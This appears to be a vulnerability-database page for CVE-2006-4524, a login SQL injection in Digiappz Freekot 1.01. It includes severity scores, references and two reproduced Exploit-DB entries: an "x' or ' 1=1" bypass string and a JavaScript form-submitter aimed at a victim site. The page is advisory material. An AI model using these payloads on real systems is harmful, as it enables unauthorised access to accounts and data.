CVE-2006-4524
published 2006-09-01
CVE-2006-4524: Multiple SQL injection vulnerabilities in login_verif.asp in Digiappz Freekot 1.01 allow remote attackers to execute arbitrary SQL commands via the (1) login…
Priority: P342, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.26% (65.9th percentile)
Multiple SQL injection vulnerabilities in login_verif.asp in Digiappz Freekot 1.01 allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) password parameters. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digiappz | freekot | — | — |
No detection rules found.
Exploit-DB
Digiappz Freekot - Authentication Bypass
exploitdb·2009-12-16
---
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~]Tybe:(4u7h 8yp455) Remote SQL Injection Vulnerability
[?]
[~]Vendor: www.digiappz.com
[?]Software:freekot
[?]
[?]author: ((R3d-D3v!L))
[?]
[?]Date: 16.dec.2009
[?]T!ME: 11:30 pm
[?] Home: WwW.xP10.ME
[?]
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[?] Exploit:
[?] E-/\/\A!L : x' or ' 1=1
[?] password : x' or ' 1=1
[?]demo:
[?]http://server/freekot/login.asp
N073:
REAL RED DEV!L W@S h3r3 LAMERZ
GAZA !N our hearts !
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------
[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0
Exploit-DB
Digiappz Freekot 1.01 - ASP SQL Injection
exploitdb·2006-08-30
---
source: https://www.securityfocus.com/bid/19768/info
Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit could allow an attacker to compromise the application, retrieve sensitive information, or modify data; other consequences are possible as well.
KAPDA :: Freekot SQL-Injection Vulnerability , Login bypass exploit

```javascript
function egxpl() {
  if (document.xplt.victim.value == "") {
    alert("Please enter victim site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action = document.xplt.victim.value + "/login_verif.asp";
    xplt.login.value = document.xplt.login.value;
    xplt.password.value = document.xplt.password.value;
    xplt.submit();
  }
}
```

KAPDA :: Freekot SQL-Injecti
No writeups or analysis indexed.
- http://secunia.com/advisories/21669
- http://securityreason.com/securityalert/1488
- http://www.kapda.ir/advisory-410.html
- http://www.kapda.ir/attach-1996-xpl_freekot.htm
- http://www.securityfocus.com/archive/1/444752/100/0/threaded
- http://www.securityfocus.com/bid/19768
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28672
Published: 2006-09-01